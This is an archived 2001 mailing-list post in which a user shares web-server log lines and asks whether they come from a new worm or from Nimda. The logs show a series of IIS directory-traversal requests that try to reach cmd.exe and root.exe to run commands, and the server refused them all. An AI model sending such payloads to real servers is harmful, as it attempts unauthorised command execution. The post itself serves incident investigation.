|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Rob 'Feztaa' Park (fezziker
home.com)Date: Thu Oct 04 2001 - 23:15:07 CDT
Is this some kind of new worm, or is this part of Nimda?
...
24.79.126.53 - - [04/Oct/2001:22:04:45 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:48 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:50 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 43 "-" "-"
24.79.126.53 - - [04/Oct/2001:22:04:53 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
...
I think that's pretty messed up that all 10 of those happened within 7
seconds of each other... My logs are full of this crud.
Thanks in advance :)
-- Rob 'Feztaa' Park fezziker
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]